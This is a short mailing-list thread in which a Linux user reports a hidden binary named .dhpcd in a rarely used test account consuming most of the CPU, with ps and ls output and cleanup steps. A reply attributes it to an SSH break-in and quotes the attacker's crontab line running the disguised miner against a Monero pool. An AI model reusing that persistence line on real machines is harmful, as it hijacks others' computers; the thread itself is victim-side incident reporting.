The problem occurred when someone hacked ssh to log in as my test user. They installed an executable file .dhcpd and started it in crontab. I killed the app and cleared the executable bits. I then removed the crontab line. 2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null 2>/dev/null On 2021-03-02 9:17 a.m., James Knott wrote:
Today, I noticed my computer performance was very poor. Top showed something called .dhcpd running under user test and using almost 400% of my CPU. In ~/test, I found an executable .dhcpd. I have not used the test account for a long time. That .dhcpd also survived a reboot, so I'll have to determine how it's starting.
Here is some info:
linux:~ # ps aux|grep test test 3887 0.0 0.0 72236 7956 ? Ss 09:02 0:00 /usr/lib/systemd/systemd --user test 3888 0.0 0.0 265004 3220 ? S 09:02 0:00 (sd-pam) test 3909 416 7.3 2439200 2401880 ? SNsl 09:02 5:35 /home/test/.dhpcd root 5532 0.0 0.0 7432 920 pts/2 S+ 09:03 0:00 grep --color=auto test linux:~ # cd ~test linux:/home/test # ls .Xauthority .config .emacs .gtkrc-2.0 .local .profile .xinitrc.template Downloads Templates .bash_history .dbus .esd_auth .i18n .mozilla .qt .xsession-errors-:1 Music Videos .bashrc .dhpcd .fonts .inputrc .nx .ssh Desktop Pictures bin .cache .dmrc .gnupg .kde4 .pki .xim.template Documents Public public_html linux:/home/test # ls -l .dhpcd -rwxr-xr-x 1 test users 3458848 Mar 1 18:38 .dhpcd linux:/home/test # kill -9 3909 linux:/home/test # ps aux|grep test root 7884 0.0 0.0 7432 820 pts/2 S+ 09:06 0:00 grep --color=auto test linux:/home/test # more .dhpcd
******** .dhpcd: Not a text file ********
linux:/home/test # ls -a .dhpcd .dhpcd linux:/home/test # ls -al .dhpcd -rwxr-xr-x 1 test users 3458848 Mar 1 18:38 .dhpcd linux:/home/test #
There were some updates yesterday, so I wonder if one of them is infected with something. Also, this computer is configured with a static IPv4 address and uses SLAAC on IPv6, so it shouldn't be using dhcpd.